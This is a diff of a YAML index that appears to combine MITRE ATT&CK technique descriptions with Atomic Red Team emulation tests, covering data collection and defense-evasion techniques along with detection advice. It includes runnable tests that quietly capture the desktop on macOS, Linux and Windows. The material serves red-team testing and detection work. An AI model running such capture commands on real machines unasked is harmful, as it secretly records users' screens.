+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Remote Data Staging
+ description: |-
+ Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
+ By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-09-14T19:48:07.491Z'
+ created: '2020-03-13T21:14:58.206Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ atomic_tests: []
+ T1114.002:
+ technique:
+ created: '2020-02-19T18:52:24.547Z'
+ modified: '2020-02-19T20:53:50.908Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
+ description: Adversaries may target an Exchange server or Office 365 to collect
+ sensitive information. Adversaries may leverage a user's credentials and interact
+ directly with the Exchange server to acquire information from within a network.
+ Adversaries may also access externally facing Exchange services or Office
+ 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
+ can be used to automate searches for specific keywords.
+ name: Remote Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.002
+ url: https://attack.mitre.org/techniques/T1114/002
+ x_mitre_platforms:
+ - Office 365
+ - Windows
+ x_mitre_data_sources:
+ - Authentication logs
+ - Email gateway
+ - Mail server
+ - Office 365 trace logs
+ x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
+ locations, especially for privileged accounts (ex: Exchange administrator
+ account).'
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1602.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602.001
+ url: https://attack.mitre.org/techniques/T1602/001
+ - source_name: SANS Information Security Reading Room Securing SNMP Securing
+ SNMP
+ url: https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
+ description: 'Michael Stump. (2003). Information Security Reading Room Securing
+ SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.'
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities
+ url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3
+ description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
+ of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
+ 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: SNMP (MIB Dump)
+ description: "Adversaries may target the Management Information Base (MIB) to
+ collect and/or mine valuable information in a network managed using Simple
+ Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository
+ that stores variable information accessible via SNMP in the form of object
+ identifiers (OID). Each OID identifies a variable that can be read or set
+ and permits active management tasks, such as configuration changes, through
+ remote modification of these variables. SNMP can give administrators great
+ insight in their systems, such as, system information, description of hardware,
+ physical location, and software packages(Citation: SANS Information Security
+ Reading Room Securing SNMP Securing SNMP). The MIB may also contain device
+ operational information, including running configuration, routing table, and
+ interface details.\n\nAdversaries may use SNMP queries to collect MIB content
+ directly from SNMP-managed devices in order to collect network information
+ that allows the adversary to build network maps and facilitate future targeted
+ exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device
+ Attacks) "
+ id: attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T01:54:22.812Z'
+ created: '2020-10-19T23:51:05.953Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks that expose MIB content or use unauthorized protocols.(Citation:
+ Cisco Advisory SNMP v3 Authentication Vulnerabilities)'
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1113:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1113
+ url: https://attack.mitre.org/techniques/T1113
+ - external_id: CAPEC-648
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/648.html
+ - source_name: CopyFromScreen .NET
+ url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
+ description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved
+ March 24, 2020.
+ - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
+ description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
+ code. Retrieved July 5, 2017.
+ source_name: Antiquated Mac Malware
+ description: 'Adversaries may attempt to take screen captures of the desktop
+ to gather information over the course of an operation. Screen capturing functionality
+ may be included as a feature of a remote access tool used in post-compromise
+ operations. Taking a screenshot is also typically possible through native
+ utilities or API calls, such as CopyFromScreen, xwd,
+ or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
+ Mac Malware)
+
+'
+ name: Screen Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T19:56:37.627Z'
+ created: '2017-05-31T21:31:25.060Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_detection: Monitoring for screen capture behavior will depend on the
+ method used to obtain data from the operating system and write output files.
+ Detection methods could include collecting information from unusual processes
+ using API calls used to obtain image data, and monitoring for image files
+ written to disk. The sensor data may need to be correlated with other events
+ to identify malicious activity, depending on the legitimacy of this behavior
+ within a given network environment.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1113
+ atomic_tests:
+ - name: Screencapture
+ auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
+ description: 'Use screencapture command to collect a full desktop screenshot
+
+'
+ supported_platforms:
+ - macos
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ executor:
+ command: 'screencapture #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Screencapture (silent)
+ auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
+ description: 'Use screencapture command to collect a full desktop screenshot
+
+'
+ supported_platforms:
+ - macos
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ executor:
+ command: 'screencapture -x #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: X Windows Capture
+ auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
+ description: 'Use xwd command to collect a full desktop screenshot and review
+ file with xwud
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.xwd"
+ executor:
+ command: |
+ xwd -root -out #{output_file}
+ xwud -in #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Capture Linux Desktop using Import Tool
+ auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
+ description: 'Use import command from ImageMagick to collect a full desktop
+ screenshot
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ dependencies:
+ - description: 'ImageMagick must be installed
+
+'
+ prereq_command: 'if import --version; then exit 0; else exit 1; fi
+
+'
+ get_prereq_command: 'sudo apt-get -y install imagemagick
+
+'
+ executor:
+ command: 'import -window root #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Windows Screencapture
+ auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
+ description: 'Use Psr.exe binary to collect screenshots of user display. Test
+ will do left mouse click to simulate user behaviour
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: c:\temp\T1113_desktop.zip
+ recording_time:
+ description: Time to take screenshots
+ type: String
+ default: 5
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
+ Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
+ [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
+ cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
+ cleanup_command: 'rm #{output_file} -ErrorAction Ignore'
+ T1213.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213.002
+ url: https://attack.mitre.org/techniques/T1213/002
+ - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ source_name: Microsoft SharePoint Logging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Sharepoint
+ description: |
+ Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T16:41:00.821Z'
+ created: '2020-02-14T13:35:32.938Z'
+ x_mitre_detection: "The user access logging within Microsoft's SharePoint can
+ be configured to report access to certain pages and documents. (Citation:
+ Microsoft SharePoint Logging). As information repositories generally have
+ a considerably large user base, detection of malicious use can be non-trivial.
+ At minimum, access to information repositories performed by privileged users
+ (for example, Active Directory Domain, Enterprise, or Schema Administrators)
+ should be closely monitored and alerted upon, as these types of accounts should
+ not generally used to access information repositories. If the capability exists,
+ it may be of value to monitor and alert on users that are retrieving and viewing
+ a large number of documents and pages; this behavior may be indicative of
+ programmatic means being used to retrieve all data within the repository.
+ In environments with high-maturity, it may be possible to leverage User-Behavioral
+ Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ atomic_tests: []
+ T1125:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1125
+ external_id: T1125
+ - external_id: CAPEC-634
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/634.html
+ - url: https://objective-see.com/blog/blog_0x25.html
+ description: Patrick Wardle. (n.d.). Retrieved March 20, 2018.
+ source_name: objective-see 2017 review
+ description: |-
+ An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
+
+ Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
+
+ In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
+ name: Video Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:40:47.644Z'
+ created: '2017-05-31T21:31:37.917Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1056.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.003
+ url: https://attack.mitre.org/techniques/T1056/003
+ - external_id: CAPEC-569
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/569.html
+ - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
+ description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
+ Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
+ source_name: Volexity Virtual Private Keylogging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Portal Capture
+ description: |-
+ Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
+
+ This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
+ id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:16:16.580Z'
+ created: '2020-02-11T18:59:50.058Z'
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
+ x_mitre_data_sources:
+ - File monitoring
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
defense-evasion:
T1548:
@@ -21562,7 +25175,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.923Z'
+ modified: '2020-07-22T21:36:52.825Z'
created: '2020-01-30T13:58:14.373Z'
x_mitre_data_sources:
- Windows Registry
@@ -21692,23 +25305,26 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1550.001
url: https://attack.mitre.org/techniques/T1550/001
+ - external_id: CAPEC-593
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/593.html
- description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure
APIs. Retrieved September 12, 2019.
url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs
Sept 2019
- - source_name: okta
- url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
- description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
+ - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
September 12, 2019.
- - source_name: Microsoft Identity Platform Access 2019
- url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
- description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
+ url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
+ source_name: okta
+ - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
Microsoft identity platform access tokens. Retrieved October 4, 2019.
- - source_name: Staaldraad Phishing with OAuth 2017
- url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
- description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
+ url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
+ source_name: Microsoft Identity Platform Access 2019
+ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
Retrieved October 4, 2019.
+ url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
+ source_name: Staaldraad Phishing with OAuth 2017
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -21728,9 +25344,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-23T20:24:52.899Z'
+ modified: '2020-09-16T19:40:02.024Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -22072,6 +25688,9 @@ defense-evasion:
- external_id: CAPEC-572
source_name: capec
url: https://capec.mitre.org/data/definitions/572.html
+ - external_id: CAPEC-655
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/655.html
- source_name: ESET OceanLotus
description: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using
old tricks. Retrieved May 22, 2018.
@@ -22081,7 +25700,7 @@ defense-evasion:
description: Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass
Detection in the Age of Big Data. Retrieved May 30, 2019.
- source_name: VirusTotal FAQ
- url: 'https://www.virustotal.com/en/faq/ '
+ url: https://www.virustotal.com/en/faq/
description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -22106,7 +25725,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T20:50:48.023Z'
+ modified: '2020-09-17T18:25:33.828Z'
created: '2020-02-05T14:04:25.865Z'
x_mitre_contributors:
- Martin Jirkal, ESET
@@ -22121,7 +25740,7 @@ defense-evasion:
exhibit other behavior characteristics of being used to conduct an intrusion
such as system and network information Discovery or Lateral Movement, which
could be used as event indicators that point to the source file. '
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -22171,6 +25790,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
+ - external_id: CAPEC-552
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/552.html
- source_name: Mandiant M Trends 2016
url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
@@ -22196,13 +25818,13 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-05-07T22:32:05.335Z'
+ modified: '2020-09-17T19:47:14.338Z'
created: '2019-12-19T21:05:38.123Z'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -22231,7 +25853,7 @@ defense-evasion:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- name: Bypass User Access Control
+ name: Bypass User Account Control
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -22284,7 +25906,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.510Z'
+ modified: '2020-07-22T21:36:52.458Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -22311,7 +25933,7 @@ defense-evasion:
x_mitre_effective_permissions:
- Administrator
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_defense_bypassed:
- Windows User Account Control
identifier: T1548.002
@@ -22531,7 +26153,7 @@ defense-evasion:
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
- CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
+ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49
type: attack-pattern
kill_chain_phases:
@@ -22560,7 +26182,7 @@ defense-evasion:
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
- * To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
+ * To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
x_mitre_platforms:
- Windows
identifier: T1218.003
@@ -22666,7 +26288,7 @@ defense-evasion:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -22836,41 +26458,64 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1070.003
url: https://attack.mitre.org/techniques/T1070/003
+ - source_name: Microsoft PowerShell Command History
+ url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
+ description: Microsoft. (2020, May 13). About History. Retrieved September
+ 4, 2020.
+ - source_name: Sophos PowerShell command audit
+ url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
+ description: jak. (2020, June 27). Live Discover - PowerShell command audit.
+ Retrieved August 21, 2020.
+ - source_name: Sophos PowerShell Command History Forensics
+ url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
+ description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
+ Retrieved September 4, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Clear Command History
description: |-
- In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
+ In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
- These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
